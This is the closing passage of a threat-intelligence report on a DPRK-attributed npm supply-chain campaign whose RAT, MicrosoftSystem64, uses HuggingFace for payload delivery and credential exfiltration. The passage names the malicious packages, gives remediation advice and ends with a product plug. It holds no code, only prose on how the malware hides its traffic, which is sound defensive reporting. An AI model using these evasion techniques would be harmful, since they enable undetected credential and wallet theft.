kmsec.uk and OX Security independently attribute this cluster to FAMOUS CHOLLIMA (also tracked as Contagious Interview), a DPRK-linked threat actor group known for targeting developers through poisoned npm packages, fake job interviews, and trojanized trading tools. The toskypi identity appears alongside approximately 20 other npm accounts in the Contagious Trader report, and kmsec.uk linked jpeek895 to the earlier BigSquatRat campaign (bigmathix, bigmathutils, axios-net) from January 2026.

The operational pattern is consistent: purpose-built throwaway npm accounts, cryptocurrency/developer tooling as lures, credential theft with a focus on crypto wallets, and infrastructure pivoting after disclosure. What distinguishes this particular iteration is the adoption of HuggingFace as both a binary CDN and exfiltration backend, a technique that makes network-level detection significantly harder since all traffic appears as authenticated HTTPS requests to a legitimate ML platform.

Conclusion

MicrosoftSystem64 is a well-engineered, multi-platform RAT that leverages HuggingFace as both a binary distribution CDN and a data exfiltration backend. The abuse of a legitimate ML platform for command-and-control infrastructure makes network-level detection challenging: all exfiltration traffic appears as authenticated HTTPS requests to huggingface.co. The 24-task C2 protocol, cross-platform keylogger, 80+ wallet extension targets, and persistent self-update loop make this a comprehensive credential theft platform operating in the open source supply chain.

Our live probe of the attacker’s infrastructure on May 28, 2026 confirmed this is not a theoretical threat: the exfiltration pipeline was actively operating, the embedded HuggingFace token was still valid, and real victims were being surveilled with screenshots captured every 60 seconds and hundreds of credential files exfiltrated. The attacker has already pivoted accounts once (from Lordplay to jpeek998) after the first repo was disabled, demonstrating operational resilience.

Organizations that installed js-logger-pack, terminal-logger-utils, ts-logger-pack, pretty-logger-utils, pinno-loggers, or any other package from the jpeek*/toskypi cluster should treat it as a full compromise: rotate all credentials, SSH keys, API tokens, and crypto wallet seed phrases on affected machines. The actor’s pattern of rapid account rotation after takedowns means new package names distributing the same MicrosoftSystem64 binary should be expected.

To detect this payload in your dependency tree before it executes, scan your projects with vet.
